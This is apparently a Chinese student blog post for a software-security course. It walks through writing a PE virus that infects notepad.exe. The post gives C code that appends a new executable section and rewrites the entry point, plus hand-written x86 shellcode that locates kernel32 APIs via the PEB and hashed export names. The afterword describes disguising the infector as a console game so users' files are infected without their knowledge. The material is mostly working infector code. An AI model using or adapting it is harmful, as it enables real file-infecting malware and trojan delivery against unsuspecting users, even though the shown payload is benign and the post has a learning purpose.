导语

这是我软件安全作业，希望对想要学习PE病毒编写的同学们有所帮助。

目标

编写一个PE文件传染程序infect.exe，功能要求如下：

infect.exe运行后，向同目录下的notepad.exe程序植入“病毒载荷”代码.
infect.exe不能重复传染notepad.exe.
notepad.exe被植入“病毒载荷”后，具备如下行为：一旦执行，就会向其所在目录写入一个txt文件，文件名为：学号-姓名.txt，文件内容为空。注意：这里的姓名和学号要改为同学自己的名字和学号。

基本思路

infect.exe的目标是向notepad.exe插入一段病毒载荷，也就是说我们要向一个已知的PE文件插入一段代码，使他能做到我们想要它做到的，但是实际上它并不应该能做到的功能。
一般来说PE病毒的载荷插入方式有两种，其一是在节之间插入，其二是新建节插入。
在节之间插入的好处是不用改entrypoint，在shellcode里不需要jmp回原本的entrypoint，基本上顺着执行原本的PE文件的过程中就可以将你的shellcode执行了，而缺点也显而易见，节之间的空间可能不足，可能出现无法植入shellcode的情况，而如果要利用多个节之间的空间的话就意味着载荷得分段执行，寄存器堆栈的状态都很可能变化，因此编写shellcode非常困难。
而新建节和节之间插入的优缺点刚好相反。相较之下更改entrypoint是比足够简单的，因此我们选择新建节植入shellcode。

具体实现

借鉴了网上很多的代码，大部分是使用handle非常便捷的修改了PE头的各个字段，而我由于太菜了加上正好需要具体理解PE格式，所以采用了很简单的文件指针的操作。

新建节

由上一篇博客可知，新建节要修改的内容有

PE头中的fileheader字段（IMAGE_NT_HEADERS.FileHeader的内容)
PE头中的optionalheader字段(IMAGE_NT_HEADERS.OptionalHeader的内容)
新节的节首部各个字段（IMAGE_SECTION_HEADER的各个内容）

需要注意的是，由于我们多加了一个节头，这个接头会覆盖掉原本应该放IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT的位置，不过一般情况下这个地方是被保留的，全为0，因此我们只需将ntheader中指向这里的指针清空即可（也不能叫它指针吧），也就是将OptionalHeader.DataDirectory[11]的virtualaddress和size全清0。如果不清零的话，在装载PE程序的时候会装载器会报错。

具体代码如下

IMAGE_SECTION_HEADER addsection(char *file)
{

    IMAGE_DOS_HEADER image_dos_header;
    IMAGE_NT_HEADERS image_nt_headers;
    IMAGE_SECTION_HEADER image_section_header; // 用于存储新加的节表项
    IMAGE_SECTION_HEADER old_section;          // 存储旧的节表项
    int num_section = 0;
    //    byte sec[8]=".txt";



    FILE *h;
    h = fopen(file, "rb+");
    fseek(h, 0, SEEK_SET);
    fread(&image_dos_header, sizeof(IMAGE_DOS_HEADER), 1, h);
    fseek(h, image_dos_header.e_lfanew, SEEK_SET);
    fread(&image_nt_headers, sizeof(IMAGE_NT_HEADERS), 1, h); //PE头
    //printf("%d", sizeof(IMAGE_NT_HEADERS));
    //for (int a = 0; a <= 15; a++)
    //  printf("%x,%x\n", image_nt_headers.OptionalHeader.DataDirectory[a].VirtualAddress, image_nt_headers.OptionalHeader.DataDirectory[a].Size);

    num_section = image_nt_headers.FileHeader.NumberOfSections;
    fseek(h, image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS) + (num_section - 1) * sizeof(IMAGE_SECTION_HEADER), SEEK_SET);// 跳到最后一个节表项
    fread(&old_section, sizeof(IMAGE_SECTION_HEADER), 1, h);  // 存储最后一个节表项到old_section

    image_nt_headers.FileHeader.NumberOfSections += 1;
    image_section_header.Characteristics = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ;
    image_section_header.Misc.VirtualSize = image_nt_headers.OptionalHeader.SectionAlignment;
    //bool x=true;
    for (int n = 1; true; n++) {
        if (image_nt_headers.OptionalHeader.FileAlignment *n > 520) break; 
        image_section_header.SizeOfRawData = image_nt_headers.OptionalHeader.FileAlignment * n;
        strcpy((char*)image_section_header.Name, ".viru");
        image_section_header.PointerToRawData = alig(old_section.PointerToRawData + old_section.SizeOfRawData, image_nt_headers.OptionalHeader.FileAlignment);
        image_section_header.VirtualAddress = alig(old_section.VirtualAddress + old_section.SizeOfRawData, image_nt_headers.OptionalHeader.SectionAlignment);
        fseek(h, image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS) + num_section * sizeof(IMAGE_SECTION_HEADER), SEEK_SET);
        fwrite(&image_section_header, sizeof(IMAGE_SECTION_HEADER), 1, h);
    }

    image_nt_headers.OptionalHeader.SizeOfImage = alig(image_section_header.VirtualAddress + image_section_header.SizeOfRawData, image_nt_headers.OptionalHeader.SectionAlignment);
    image_nt_headers.OptionalHeader.DataDirectory[11].VirtualAddress = 0;
    image_nt_headers.OptionalHeader.DataDirectory[11].Size = 0;
    fseek(h, image_dos_header.e_lfanew, SEEK_SET);
    fwrite(&image_nt_headers, sizeof(IMAGE_NT_HEADERS), 1, h);

    fseek(h, image_section_header.PointerToRawData, SEEK_SET);
    byte *s = (byte *)malloc(image_section_header.SizeOfRawData);
    ZeroMemory((void *)s, image_section_header.SizeOfRawData);
    fwrite(s, image_section_header.SizeOfRawData, 1, h);


    fclose(h);

    return image_section_header;// 返回病毒节

}

修改入口点

只需要将optionalheader中的addressofentrypoint改为新加节的rva即可。

DWORD changeentry(DWORD entry,char* target) {
    FILE* fp = fopen(target, "rb+");
    if (fp == NULL) {
        //printf("can not open file");
        return 0;
    }
    // 获取dos头
    IMAGE_DOS_HEADER dosHeader;
    fread(&dosHeader, 1, sizeof(dosHeader), fp);
    // 获取PE头
    DWORD offsetPeHeader = dosHeader.e_lfanew;
    fseek(fp, offsetPeHeader, SEEK_SET);
    IMAGE_NT_HEADERS ntHeader;
    fread(&ntHeader, 1, sizeof ntHeader, fp);
    fseek(fp, offsetPeHeader, SEEK_SET);
    DWORD old_entry;
    old_entry = ntHeader.OptionalHeader.AddressOfEntryPoint;
    ntHeader.OptionalHeader.AddressOfEntryPoint = entry;
    DWORD offset;
    offset = entry - old_entry;
    fwrite(&ntHeader, sizeof(ntHeader), 1, fp);
    fclose(fp);
    return offset;
}

编写shellcode

shellcode使用汇编写，由于我太菜了汇编能力低下，这里就参考了《0day安全_软件漏洞分析技术(第二版)》的代码。
因为我们是要创建一个文件，所以需要用到的函数只有kernel32.dll的CreateFileA函数，由此，我们的shellcode编写的步骤如下。

获取kernel32.dll基址并读引入表以获得想要的函数

首先我们需要获得kernel32.dll的位置，所有的win32程序都会加载ntdll.dll和kernel32.dll，进行以下步骤。
通过段选择字FS在内存中找到当前的线程环境块TEB
TEB偏移0x30的地方存着指向进程环境块PEB的指针
PEB偏移位置为0x0C的地方存放着PEB_LDR_DATA的指针，PEB_LDR_DATA结构体中存放着已经被进程装载的动态链接库信息，
PEB_LDR_DATA结构体偏移位置为0x1C指向模块初始化链表的头指针InInitializationOrderModuleList
InInitializationOrderModuleList中按照顺序存放和PE装入运行时初始化模块的信息，第一个链表结构是ntdll.dll，第二个节点就是kernel32.dll
kernel32.dll的节点偏移0x08就是kernel32.dll在内存中的加载基址
kernel32.dll的加载基址偏移0x3C就是kernel32.dll的PE头
PE头偏移0x78的地方存着指向函数导出表的指针
导出表偏移0x1C指向存储导出函数RVA的列表（IAT）
导出表偏移0x20指向存储导出函数名的列表（INT）
函数的RVA地址和名字按顺序存在这两个表中，我们可以在名称列表中定位到所需的函数的下标，然后在地址表里找到对应的RVA。
又由于我们已经得到了动态加载库的加载基址，就获得了所需API在内存中的虚拟地址。

获取kernel32.dll的基地址

mov ebx, fs:[edx + 0x30]    ; ebx = address of PEB 
mov ecx, [ebx + 0x0c]       ; ecx = pointer to loader data 
mov ecx, [ecx + 0x1c]       ; ecx = first entry in initialisation order list 
mov ecx, [ecx]              ; ecx = second entry in list (kernel32.dll) 
mov ebp, [ecx + 0x08]       ; ebp = base address of kernel32.dll

读取kernel32.dll的引入表

lodsd                       ; load next hash into al and increment esi 
pushad                      ; preserve registers 
mov eax, [ebp + 0x3c]       ; eax = start of PE header 
mov ecx, [ebp + eax + 0x78] ; ecx = relative offset of export table 
add ecx, ebp                ; ecx = absolute addr of export table 
mov ebx, [ecx + 0x20]       ; ebx = relative offset of names table 
add ebx, ebp                ; ebx = absolute addr of names table 
xor edi, edi                ; edi will count through the functions

寻找对应的函数

inc edi                     ; increment function counter 
mov esi, [ebx + edi * 4]    ; esi = relative offset of current function name 
add esi, ebp                ; esi = absolute addr of current function name 
cdq                         ; dl will hold hash (we know eax is small)
inc edi                     ; increment function counter 
mov esi, [ebx + edi * 4]    ; esi = relative offset of current function name 
add esi, ebp                ; esi = absolute addr of current function name 
cdq                         ; dl will hold hash (we know eax is small)

大家可能不理解hash是干啥的，由于我们win32程序使用的寄存器都是32位的，而我们要读取的函数的名称长度不一，所以我们使用哈希的方法来将长的函数名变成一个等长度的串，以便于cmp。

movsx eax, byte ptr[esi]
cmp al,ah
jz compare_hash
ror edx,7
add edx,eax
inc esi
jmp hash_loop

而比较hash的函数如下，如果我们没找到的话就再拿下一个函数，让他hash然后再比较，如果找到了的话就去对应的IAT找他的绝对地址，并且将他push到edi栈的位置

cmp edx, [esp + 0x1c]       ; compare to the requested hash (saved on stack from pushad) 
jnz next_function_loop 
mov ebx, [ecx + 0x24]       ; ebx = relative offset of ordinals table 
add ebx, ebp                ; ebx = absolute addr of ordinals table 
mov di, [ebx + 2 * edi]     ; di = ordinal number of matched function 
mov ebx, [ecx + 0x1c]       ; ebx = relative offset of address table 
add ebx, ebp                ; ebx = absolute addr of address table 
add ebp, [ebx + 4 * edi]    ; add to ebp (base addr of module) the 
                            ; relative offset of matched function 
xchg eax, ebp               ; move func addr into eax 
pop edi                     ; edi is last onto stack in pushad 
stosd                       ; write function addr to [edi] and increment edi 
push edi 
popad                   ; restore registers 
                        ; loop until we reach end of last hash 
cmp eax,0x1e380a6a
jne find_lib_functions

直到找完最后一个要找的函数的hash为止。

然后再最后用edi-几来调用对应的函数。
总体代码如下

int main()
{
    _asm{
        nop;
        CLD;
        push 0x94e43293                     ;hash of CreateFileA
        push 0x4fd18963                     ;hash of ExitProcess
        mov esi, esp
        lea edi, [esi-0x0c]
            

        xor ebx, ebx
        mov bh, 0x04
        sub esp, ebx

        mov bx,0x3233
        push ebx
        push 0x72657375
        push esp
        xor edx, edx

    ; find base addr of kernel32.dll 
        mov ebx, fs:[edx + 0x30]    ; ebx = address of PEB 
        mov ecx, [ebx + 0x0c]       ; ecx = pointer to loader data 
        mov ecx, [ecx + 0x1c]       ; ecx = first entry in initialisation order list 
        mov ecx, [ecx]              ; ecx = second entry in list (kernel32.dll) 
        mov ebp, [ecx + 0x08]       ; ebp = base address of kernel32.dll 

find_functions:
        lodsd
        pushad
        mov eax, [ebp + 0x3c]
        mov ecx, [ebp + eax + 0x78] 
        add ecx, ebp        
        mov ebx, [ecx + 0x20]   
        add ebx, ebp        
        xor edi, edi        

next_function_loop:
        inc edi             
        mov esi, [ebx + edi * 4]    
        add esi, ebp        
        cdq                 

hash_loop:
        movsx eax, byte ptr[esi]    
        cmp al, ah          
        jz compare_hash     
        ror edx, 7          
        add edx, eax        
        inc esi             
        jmp hash_loop       

compare_hash:
        cmp edx, [esp + 0x1c]       
        jnz next_function_loop      
        mov ebx, [ecx + 0x24]       
        add ebx, ebp        
        mov di, [ebx +2 * edi]      
        mov ebx, [ecx + 0x1c]       
        add ebx, ebp        
        add ebp, [ebx + 4 * edi]    
        xchg eax, ebp       
        pop edi             
        stosd               

        push edi            
        popad               

        cmp eax, 0x94e43293 
        jne find_functions  

function_call:
        push ebp;
        mov ebp,esp;
        mov esi,esp
        sub esp,18h ;
        mov dword ptr [ebp-18h],    ;数据脱敏 ~
        mov dword ptr [ebp-14h],     
        mov dword ptr [ebp-10h],   
        mov dword ptr [ebp-0ch],
        mov dword ptr [ebp-08h],   
        mov dword ptr [ebp-04h],    

        xor eax, eax
        push eax
        mov al, 0x82
        push eax
        mov al, 0x02
        push eax
        xor al, al
        push eax
        push eax
        mov al, 0x40
        sal eax, 0x18
        push eax
        lea eax,[ebp-18h] 
        push eax 
        call [edi - 0x04]
        mov esp, esi
        pop ebp
        xor ebx, ebx
        push ebx
        call [edi - 0x0c]
        nop
        nop
        nop
    }
    return 0;
}

获取shellcode的机器码

编译上面的代码，然后将生成的exe放入OD，选择反汇编，在左下角即可看到我们输入的汇编，然后将他的机器码复制下来即可。

将shellcode写入

简单的用fwrite往新节的pointertorawdata的位置写入shellcode即可。

跳回原来的entrypoint

运行一下已经完成的程序，这会将notepad.exe写入shellcode，修改entrypoint，总之就是一切都完成了除了跳回原本的entrypoint。这时我们将notepad.exe放入OD，可以很快地找到我们的shellcode的汇编，然后慢慢走到最后，可以看到一个jmp指令，这个是PE装载器在装入这个节的时候自动加上的。我们记住这个指令的地址，然后用这个指令地址减去我们修改的入口点+5（这个指令的下一个指令的地址），然后再写入shellcode之后再加上一条对应的jmp指令即可。
至此，我们的shellcode注入就完成了。

后记

后来我还把这个病毒程序所有的printf函数全注释掉，exit变成return，然后伪装成了一个简简单单的控制台小游戏，这样在你玩游戏的时候就会不知不觉的发现你同目录下的notepad.exe被感染了。而且本来跳回原来的entrypoint这个地方我是想让他自动实现的，可以看到我的changeentry函数返回了两个入口点之间的差值，但是我做到最后转念一想，我本来就是做了一个学习性质的感染程序，没必要啊，然后就没做，事实上只要我们得出了jmp的位置和修改后的entrypoint的差值，再加上两个入口点的差值，自动地写入jmp指令就可以了。